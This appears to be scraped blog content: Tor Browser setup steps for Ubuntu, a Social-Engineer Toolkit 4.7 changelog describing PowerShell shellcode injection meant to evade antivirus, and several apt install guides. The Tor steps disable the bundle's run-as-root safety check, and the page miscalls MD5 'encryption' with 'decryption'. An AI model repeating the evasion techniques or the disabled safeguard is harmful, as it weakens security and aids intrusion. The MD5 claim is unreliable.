step 3. Press 'i' on your keyboard.
step 4. Add this line at the bottom:  deb http://deb.torproject.org/torproject.org lucid main
step 5. Press ESC, type a colon, type wq and hit enter.
step 6. Run this command: gpg --keyserver keys.gnupg.net --recv 886DDD89
step 7. Run this command: gpg --export A3C4F0F979CAA22CDBA8F512EE8CBC9E886DDD89 | sudo apt-key add -
step 8. apt-get update
step 9. apt-get install tor tor-geoipdb
step 10. Download Tor Browser Bundle for Ubuntu (To your desktop). https://www.torproject.org/projects/torbrowser.html.en

step 11. cd Desktop
step 12. Download the architecture-appropriate file above, save it somewhere, then run one of the following two commands to extract the package archive:

tar -xvzf tor-browser-gnu-linux-i686-2.2.37-2-dev-en-US.tar.gz
or
tor-browser-gnu-linux-i686-2.2.37-2-dev-en-US.tar.gz

step 13. chown -R root:root ./tor-browser_en-US
step 14. Open the folder 'Tor-Browser_en-US"
step 15. Open the file 'start-tor-browser in gedit.
step 16. Find the line:
"if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root.  Exiting."
exit 1

17. Change to:

if [ "`id -u`" -eq 1 ]; then
complain "The Tor Browser Bundle should not be run as root.  Exiting."
exit 1

now install polipo


18. apt-get install polipo
19. cd /etc/polipo
20. mv config conf-backup.txt
21. Download and copy polipo config
22. vi config
23. Press 'i' on your keyboard.
24. Paste the text you just copied.
25. Press ESC, type a colon, type wq and hit enter.
26. service polipo start
27. service tor start
28. Start tor browser bundle (From the file on your desktop).
To run the Tor Browser Bundle, execute the start-tor-browser script:
# ./start-tor-browser

Remember, polipo runs on port 8118, TOR runs on 9050

Be sure to stop both when you need to update anything:

By giving Command Like

1. service tor stop
2. service polipo stop

VIDEO TUTORIAL :

PyInjector Shellcode Injection

Awhile back Bernardo Damele showed a cool method for utilizing an executable to deliver alphanumeric shellcode straight into memory. This was an awesome attack vector and allowed for AV and other security mechanisms such as HIPS and others to be circumvented extremely easy. You can download shellcodeexec here. Since then, Matthew Graeber came out with a technique for injecting shellcode straight into memory through Powershell. This technique eventually made it into the Social-Engineer Toolkit (SET) as a method for the Java Applet and never touching disk. You can read the blog post here.

The Social-Engineer Toolkit (SET) v4.7 released

The Social-Engineer Toolkit (SET) version 4.7 codename “Headshot” has been released. This version of SET introduces the ability to specify multi-powershell injection which allows you to specify as many ports as you want and SET will automatically inject PowerShell onto the system on all of the reverse ports outbound. What’s nice with this technique is it never touches disk and also uses already white listed processes. So it should never trigger anything like anti-virus or whitelisting/blacklisting tools. In addition to multi-powershell injector, there are a total of 30 new features and a large rewrite of how SET handles passing information within different modules.

Change log for version 4.7

• removed a prompt that would come up when using the powershell injection technique, port.options is now written in prep.py versus a second prompt with information that was already provided


• began an extremely large project of centralizing the SET config file by moving all of the options to the set.options file under src/program_junk


• moved all port.options to the central routine file set.options


• moved all ipaddr.file to the central routine file set.options


• changed spacing on when launching the SET web server


• changed the wording to reflect what operating systems this was tested on versus browsers


• removed an un-needed print option1 within smtp_web that was reflecting a message back to user


• added the updated java bean jmx exploit that was updated in Metasploit


• added ability to specify a username list for the SQL brute forcing, can either specify sa, other usernames, or a filename with usernames in it


• added new feature called multi-powershell-injection – configurable in the set config options, allows you to use powershell to do multiple injection points and ports. Useful in egress situations where you don’t know which port will be allowed outbound.


• enabled multi-pyinjection through java applet attack vector, it is configured through set config


• removed check for static powershell commands, will load regardless – if not installed user will not know regardless – better if path variables aren’t the same


• fixed a bug that would cause linux and osx payloads to be selected even when disabled


• fixed a bug that would cause the meta_config file to be empty if selecting powershell injection


• added automatic check for Kali Linux to detect the default moved Metasploit path


• removed a tail comma from the new multi injector which was causing it to error out


• added new core routine check_ports(filename, ports) which will do a compare to see if a file already contains a metasploit LPORT (removes duplicates)


• added new check to remove duplicates into multi powershell injection


• made the new powershell injection technique compliant with the multi pyinjector – both payloads work together now


• added encrypted and obfsucated jar files to SET, will automatically push new repos to git everyday.


• rewrote the java jar file to handle multiple powershell alphanumeric shellcode points injected into applet.


• added signed and unsigned jar files to the java applet attack vector


• removed create_payload.py from saving files in src/html and instead in the proper folders src/program_junk


• fixed a payload duplication issue in create_payload.py, will now check to see if port is there


• removed a pefile check unless backdoored executable is in use


• turned digital signature stealing from a pefile to off in the set_config file


• converted all src/html/msf.exe to src/program_junk/ and fixed an issue where the applet would not load properly

It can also be downloaded through github using the following command: 
git clone https://github.com/trustedsec/social-engineer-toolkit/ set/

How to install Synaptic Package Manager in Ubuntu 12.04.2

Synaptic is a graphical package management program for apt. It provides the same features as the apt-get command line utility with a GUI front-end based on Gtk+.



sudo apt-get install synaptic

How to install Copyq(Advance Clipboard Manager) in Ubuntu 12.04.2

CopyQ is advanced clipboard manager with searchable and editable history with support for image formats, command line control and more. Command interface and graphical interface accessible from tray. By default the application stores any new clipboard content in list in the first tab.


sudo add-apt-repository ppa:samrog131/ppa
sudo apt-get update
sudo apt-get install copyq

How to install Nuvola Player 1.0.5 in Ubuntu 12.04.2

Nuvola Player runs web interface of cloud music service in its own window and provides integration with a Linux desktop (system tray, Ubuntu sound menu, dock menu and notifications). Currently supported services are Google Play, Grooveshark, Hype Machine, 8tracks and other.



sudo add-apt-repository ppa:nuvola-player-builders/stable
sudo apt-get update
sudo apt-get install nuvolaplayer

How to install Kazam Screen Caster in Ubuntu

Kazam is a simple screen recording program that will capture the content of your screen and record a video file that can be played by any video player that supports VP8/Mp4/WebM video format. It also records audio from any sound input device that is supported and visible by Pulse-audio.

Commands :
sudo add-apt-repository ppa:kazam-team/stable-series
sudo apt-get update
sudo apt-get install kazam

MD5 Encryption and Decryption Python Script

Click Here to Download Python Script